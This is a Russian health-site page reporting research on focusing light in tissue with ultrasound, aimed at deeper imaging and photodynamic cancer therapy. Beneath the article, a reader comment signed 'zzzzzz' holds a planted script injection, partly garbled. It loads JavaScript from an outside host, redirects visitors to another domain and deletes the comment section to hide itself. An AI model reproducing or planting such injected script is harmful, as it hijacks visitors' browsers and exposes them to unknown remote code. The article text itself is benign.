Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Диагностика и лечение с п...  >>  Диагностика и лечение с помощью света
 
Обратная связь
 

Диагностика и лечение с помощью света

Размер шрифта
03 августа 2012 00:00
Юрий Малышев
Здоровье инфо
Анна Белевская
Здоровье инфо
  • google_analytics: false
  • Нравится

Представьте, что операцию можно сделать без разрезов, а рак – выявить с помощью ультразвукового исследования. Благодаря открытию американских ученых в ближайшем будущем все это станет возможно!

ультразвуковая диагностика

Новый метод позволяет фокусировать луч света, который проникает в ткань человека на глубину 2,5 мм. Если данный метод удастся внедрить в клиническую практику, он значительно облегчит диагностику и лечение многих заболеваний.

История вопроса

В предыдущем исследовании ученые пропускали луч света через ткани и фиксировали результат на голографической пластине. Запись содержала всю необходимую информацию о том, как рассеивается луч света, проходя через ткань. Проматывая запись в обратном направлении, ученые посылали луч света к источнику, повторяя траекторию его движения. В результате ученым удалось послать луч через слой ткани без эффекта рассеивания. Но для того, чтобы получить изображение клеток или молекул, которые находятся в толще ткани, необходимо сфокусировать луч света в ткани.

В предыдущем исследовании для фокусировки света использовался высокочастотный ультразвук. Во-первых, он не рассеивается в ткани, а, во-вторых, ультразвук взаимодействует со светом. Вследствие так называемого акустооптического эффекта любой свет, который взаимодействует с ультразвуком, изменяется.

Суть исследования

Сначала ученые фокусировали ультразвук в небольшом участке образца ткани. Затем они освещали образец, который рассеивал свет. Вследствие акустооптического эффекта любой рассеянный свет, который проходит через участок ткани с фокусированным ультразвуком, меняется. Ученые выделили этот свет и записали его. Используя метод обратной перемотки, они послали свет обратно в участок образца ткани, где сфокусирован ультразвук.

В результате ученым удалось сфокусировать свет в этом участке, что позволило создать изображение. Изменяя место фокусировки ультразвука, ученые могут фокусировать свет на любом участке.

Результаты

Новый метод можно использовать для лечения рака с помощью фотодинамической терапии. В процессе лечения в организм пациента вводятся светочувствительные вещества, которые избирательно накапливаются в раковых клетках. Когда на раковые клетки попадает луч света, они погибают.

В настоящее время фотодинамическая терапия используется только на поверхности тела, что связано с рассеиванием света. Новый метод позволит воздействовать на раковые клетки, расположенные в толще ткани.

По сравнению с предыдущими исследованиями ученым удалось увеличить глубину проникновения света уже в два раза. Инженеры рассчитывают на то, что в течение нескольких лет им удастся увеличить глубину проникновения до 10 см.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 23:37

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Почему возникает рак   Специализированное питание как важный фактор лечения и реабилитации пациентов с онкологическими заболеваниями   Если вы грамотно лечите грипп, вы защищаете себя от рака кожи   Созданы лекарства, которые обучают организм убивать рак. Это победа!  
03 июля 2012Созданы лекарства, которые обучают организм убивать рак 18 октября 2012Новый тест скажет, будет у вас рак или нет
 
09 августа 2012Раковые клетки теперь не смогут скрыться! 06 февраля 2013Технология разведения коров позволяет определить риск развития рака
 

Слайдшоу

1
Супереда против рака
Продукты против рака
Факторы, которые влияют на возникновение рака

Тесты

1
Что вы знаете о раке груди?
Средства личной гигиены
Что вы знаете о поджелудочной железе?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.